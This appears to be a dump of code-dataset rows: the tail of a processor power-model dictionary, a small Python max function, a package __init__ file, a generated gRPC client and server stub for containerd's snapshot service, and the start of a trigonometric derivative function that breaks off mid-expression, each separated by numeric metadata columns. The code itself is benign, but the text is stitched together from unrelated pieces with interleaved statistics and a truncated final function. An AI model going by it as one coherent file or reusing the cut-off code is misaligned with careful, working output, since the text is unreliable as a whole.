'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0864383,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.066836,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.131722,
'Execution Unit/Register Files/Runtime Dynamic': 0.0758732,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.195082,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.511186,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.9743,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.0013772,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.0013772,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00123884,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000501071,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000960104,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00495335,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0118003,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0642512,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.08692,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.18756,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.218226,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.50378,
'Instruction Fetch Unit/Runtime Dynamic': 0.486791,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.019492,
'L2/Runtime Dynamic': 0.00540012,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.54226,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.1177,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0745767,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0745768,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.89442,
'Load Store Unit/Runtime Dynamic': 1.56006,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.183893,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.367787,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0652644,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0654764,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.25411,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0309867,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.522331,
'Memory Management Unit/Runtime Dynamic': 0.0964631,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.2083,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.119122,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0111705,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.108759,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.239052,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.36207,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 5.941599439234633,
'Runtime Dynamic': 5.941599439234633,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.257617,
'Runtime Dynamic': 0.1778,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 80.0936,
'Peak Power': 113.206,
'Runtime Dynamic': 18.3295,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 79.836,
'Total Cores/Runtime Dynamic': 18.1517,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.257617,
'Total L3s/Runtime Dynamic': 0.1778,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}} | 75.063457 | 124 | 0.682078 | 8,082 | 68,608 | 5.784212 | 0.067805 | 0.123556 | 0.112946 | 0.093437 | 0.939698 | 0.931206 | 0.917815 | 0.88699 | 0.862753 | 0.842239 | 0 | 0.131932 | 0.224332 | 68,608 | 914 | 125 | 75.063457 | 0.74651 | 0 | 0 | 0.642232 | 0 | 0 | 0.657421 | 0.048099 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
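The records above are flat McPAT-style power dictionaries whose keys follow a 'Component/Subcomponent/Metric' convention. A small helper can pull one metric per top-level component out of such a dict; this is a minimal sketch (the sample values are copied from the 'Processor' record above, but the helper itself is not part of the dump):

```python
# Extract one metric (e.g. 'Runtime Dynamic') for each top-level component
# from a flat McPAT-style dict with 'Component/Metric' keys.
def metric_by_component(power, metric):
    out = {}
    for key, value in power.items():
        parts = key.split('/')
        # keep only direct 'Component/Metric' entries, skip nested subcomponents
        if len(parts) == 2 and parts[1] == metric:
            out[parts[0]] = value
    return out

# A few entries copied from the 'Processor' record above.
processor = {
    'Total Cores/Runtime Dynamic': 18.1517,
    'Total L3s/Runtime Dynamic': 0.1778,
    'Total NoCs/Runtime Dynamic': 0.0,
    'Total Cores/Area': 128.669,
}

print(metric_by_component(processor, 'Runtime Dynamic'))
# {'Total Cores': 18.1517, 'Total L3s': 0.1778, 'Total NoCs': 0.0}
```

The same helper works on the per-core records as well, since they use the identical key convention.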
eda1793cde5677e1866b3ff2ec5898a029a7b3bc | 82 | py | Python | Function_Programs/max.py | saratkumar17mss040/Python-lab-programs | a2faa190acaaa30d92d4c801fd53fdc668c3c394 | [
"MIT"
] | 3 | 2020-08-26T15:29:18.000Z | 2020-09-03T13:49:13.000Z | Function_Programs/max.py | saratkumar17mss040/Python-lab-programs | a2faa190acaaa30d92d4c801fd53fdc668c3c394 | [
"MIT"
] | null | null | null | Function_Programs/max.py | saratkumar17mss040/Python-lab-programs | a2faa190acaaa30d92d4c801fd53fdc668c3c394 | [
"MIT"
] | null | null | null | def big(num1, num2, num3):
return max(num1, num2, num3)
print(big(1,2,3)) | 20.5 | 32 | 0.609756 | 15 | 82 | 3.333333 | 0.733333 | 0.32 | 0.48 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138462 | 0.207317 | 82 | 4 | 33 | 20.5 | 0.630769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 0.666667 | 0.333333 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
edb285b31a0e486c544d78c914a6ed9ace6a5e84 | 120 | py | Python | example_python_package_Blitan/__init__.py | Blitan/example_python_package_Blitan | 79719cb8a705882799e9e2b0ec382094283ced6c | [
"MIT"
] | 2 | 2021-06-09T12:22:24.000Z | 2021-06-10T16:19:07.000Z | example_python_package_Blitan/__init__.py | Blitan/example_python_package_Blitan | 79719cb8a705882799e9e2b0ec382094283ced6c | [
"MIT"
] | 3 | 2021-06-09T11:35:15.000Z | 2021-06-22T10:27:23.000Z | example_python_package_Blitan/__init__.py | Blitan/example_python_package_Blitan | 79719cb8a705882799e9e2b0ec382094283ced6c | [
"MIT"
] | null | null | null |
from .core import my_name
from .core import add
from .core import minus
from .core import multi
from .core import div
| 17.142857 | 25 | 0.775 | 21 | 120 | 4.380952 | 0.428571 | 0.434783 | 0.76087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.183333 | 120 | 6 | 26 | 20 | 0.938776 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
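The `__init__.py` above re-exports `my_name`, `add`, `minus`, `multi`, and `div` from a sibling `core` module that is not included in this dump. A minimal sketch of what such a `core.py` could look like; only the names come from the imports above, the function bodies are illustrative assumptions:

```python
# Hypothetical core.py matching the names imported by the package's __init__.py.
# Only the names are taken from the dump; the bodies are guesses.
def my_name():
    return "example_python_package_Blitan"

def add(a, b):
    return a + b

def minus(a, b):
    return a - b

def multi(a, b):
    return a * b

def div(a, b):
    return a / b

print(add(2, 3), minus(2, 3), multi(2, 3))  # 5 -1 6
```

Re-exporting names in `__init__.py` like this lets callers write `from example_python_package_Blitan import add` without knowing the internal module layout.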
eddbc9e99d798d68629db6f7ba9de3f202efdbae | 9,633 | py | Python | api_1.3/containerd/services/snapshots/v1/snapshots_pb2_grpc.py | Silvanoc/pycontainerd | 7245ce623d978f65cd8a4cf0d685a3318640a305 | [
"Apache-2.0"
] | null | null | null | api_1.3/containerd/services/snapshots/v1/snapshots_pb2_grpc.py | Silvanoc/pycontainerd | 7245ce623d978f65cd8a4cf0d685a3318640a305 | [
"Apache-2.0"
] | null | null | null | api_1.3/containerd/services/snapshots/v1/snapshots_pb2_grpc.py | Silvanoc/pycontainerd | 7245ce623d978f65cd8a4cf0d685a3318640a305 | [
"Apache-2.0"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from containerd.services.snapshots.v1 import snapshots_pb2 as containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2
from containerd.vendor.google.protobuf import empty_pb2 as containerd_dot_vendor_dot_google_dot_protobuf_dot_empty__pb2
class SnapshotsStub(object):
"""Snapshot service manages snapshots
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Prepare = channel.unary_unary(
'/containerd.services.snapshots.v1.Snapshots/Prepare',
request_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.PrepareSnapshotRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.PrepareSnapshotResponse.FromString,
)
self.View = channel.unary_unary(
'/containerd.services.snapshots.v1.Snapshots/View',
request_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.ViewSnapshotRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.ViewSnapshotResponse.FromString,
)
self.Mounts = channel.unary_unary(
'/containerd.services.snapshots.v1.Snapshots/Mounts',
request_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.MountsRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.MountsResponse.FromString,
)
self.Commit = channel.unary_unary(
'/containerd.services.snapshots.v1.Snapshots/Commit',
request_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.CommitSnapshotRequest.SerializeToString,
response_deserializer=containerd_dot_vendor_dot_google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.Remove = channel.unary_unary(
'/containerd.services.snapshots.v1.Snapshots/Remove',
request_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.RemoveSnapshotRequest.SerializeToString,
response_deserializer=containerd_dot_vendor_dot_google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.Stat = channel.unary_unary(
'/containerd.services.snapshots.v1.Snapshots/Stat',
request_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.StatSnapshotRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.StatSnapshotResponse.FromString,
)
self.Update = channel.unary_unary(
'/containerd.services.snapshots.v1.Snapshots/Update',
request_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.UpdateSnapshotRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.UpdateSnapshotResponse.FromString,
)
self.List = channel.unary_stream(
'/containerd.services.snapshots.v1.Snapshots/List',
request_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.ListSnapshotsRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.ListSnapshotsResponse.FromString,
)
self.Usage = channel.unary_unary(
'/containerd.services.snapshots.v1.Snapshots/Usage',
request_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.UsageRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.UsageResponse.FromString,
)
class SnapshotsServicer(object):
"""Snapshot service manages snapshots
"""
def Prepare(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def View(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Mounts(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Commit(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Remove(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Stat(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Update(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def List(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Usage(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_SnapshotsServicer_to_server(servicer, server):
rpc_method_handlers = {
'Prepare': grpc.unary_unary_rpc_method_handler(
servicer.Prepare,
request_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.PrepareSnapshotRequest.FromString,
response_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.PrepareSnapshotResponse.SerializeToString,
),
'View': grpc.unary_unary_rpc_method_handler(
servicer.View,
request_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.ViewSnapshotRequest.FromString,
response_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.ViewSnapshotResponse.SerializeToString,
),
'Mounts': grpc.unary_unary_rpc_method_handler(
servicer.Mounts,
request_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.MountsRequest.FromString,
response_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.MountsResponse.SerializeToString,
),
'Commit': grpc.unary_unary_rpc_method_handler(
servicer.Commit,
request_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.CommitSnapshotRequest.FromString,
response_serializer=containerd_dot_vendor_dot_google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'Remove': grpc.unary_unary_rpc_method_handler(
servicer.Remove,
request_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.RemoveSnapshotRequest.FromString,
response_serializer=containerd_dot_vendor_dot_google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'Stat': grpc.unary_unary_rpc_method_handler(
servicer.Stat,
request_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.StatSnapshotRequest.FromString,
response_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.StatSnapshotResponse.SerializeToString,
),
'Update': grpc.unary_unary_rpc_method_handler(
servicer.Update,
request_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.UpdateSnapshotRequest.FromString,
response_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.UpdateSnapshotResponse.SerializeToString,
),
'List': grpc.unary_stream_rpc_method_handler(
servicer.List,
request_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.ListSnapshotsRequest.FromString,
response_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.ListSnapshotsResponse.SerializeToString,
),
'Usage': grpc.unary_unary_rpc_method_handler(
servicer.Usage,
request_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.UsageRequest.FromString,
response_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.UsageResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'containerd.services.snapshots.v1.Snapshots', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| 52.353261 | 136 | 0.797363 | 1,061 | 9,633 | 6.768143 | 0.091423 | 0.110291 | 0.096505 | 0.110291 | 0.869935 | 0.859351 | 0.848211 | 0.805877 | 0.744604 | 0.744604 | 0 | 0.010114 | 0.137859 | 9,633 | 183 | 137 | 52.639344 | 0.854545 | 0.072148 | 0 | 0.333333 | 1 | 0 | 0.106517 | 0.054607 | 0 | 0 | 0 | 0 | 0 | 1 | 0.07483 | false | 0.061224 | 0.020408 | 0 | 0.108844 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
ede1cc368d981c4cb2d544de102b4d86f48a86f5 | 8,845 | py | Python | QIIDderivative/term4.py | avanteijlingen/lipid-md | 825c7bc982bc920a24e64e272354a7317eac9cbd | [
"MIT"
] | 2 | 2020-11-02T14:55:31.000Z | 2021-05-04T05:12:14.000Z | QIIDderivative/term4.py | avanteijlingen/lipid-md | 825c7bc982bc920a24e64e272354a7317eac9cbd | [
"MIT"
] | null | null | null | QIIDderivative/term4.py | avanteijlingen/lipid-md | 825c7bc982bc920a24e64e272354a7317eac9cbd | [
"MIT"
] | 1 | 2020-11-02T16:35:21.000Z | 2020-11-02T16:35:21.000Z | # -*- coding: utf-8 -*-
"""
author: Chris Brasnett, University of Bristol, christopher.brasnett@bristol.ac.uk
"""
import numpy as np
import math
pi=math.pi
def term4(x,y,z,m):
    # t4_x: first derivative of the term with respect to x
cg = (-6 * pi * m * math.sin(3 * pi * m * x) * math.cos(pi * m * y) * math.cos(3 * pi * m * z) -
6 * math.cos(3 * pi * m * y) * math.cos(pi * m * z) * pi * m * math.sin(3 * pi * m * x) -
2 * math.cos(3 * pi * m * z) * pi * m * math.sin(pi * m * x) * math.cos(3 * pi * m * y) +
6 * pi * m * math.cos(3 * pi * m * x) * math.cos(pi * m * y) * math.sin(3 * pi * m * z) +
6 * math.sin(3 * pi * m * y) * math.cos(pi * m * z) * pi * m * math.cos(3 * pi * m * x) -
2 * math.sin(3 * pi * m * z) * pi * m * math.sin(pi * m * x) * math.sin(3 * pi * m * y) -
6 * pi * m * math.cos(3 * pi * m * x) * math.sin(pi * m * y) * math.cos(3 * pi * m * z) +
6 * math.sin(3 * pi * m * y) * math.sin(pi * m * z) * pi * m * math.sin(3 * pi * m * x) -
2 * math.sin(3 * pi * m * z) * pi * m * math.cos(pi * m * x) * math.cos(3 * pi * m * y))
    # t4_y: first derivative with respect to y
cg0 = (-2 * pi * m * math.cos(3 * pi * m * x) * math.sin(pi * m * y) * math.cos(3 * pi * m * z) -
6 * math.sin(3 * pi * m * y) * math.cos(pi * m * z) * pi * m * math.cos(3 * pi * m * x) -
6 * math.cos(3 * pi * m * z) * math.cos(pi * m * x) * pi * m * math.sin(3 * pi * m * y) -
2 * math.sin(3 * pi * m * x) * pi * m * math.sin(pi * m * y) * math.sin(3 * pi * m * z) +
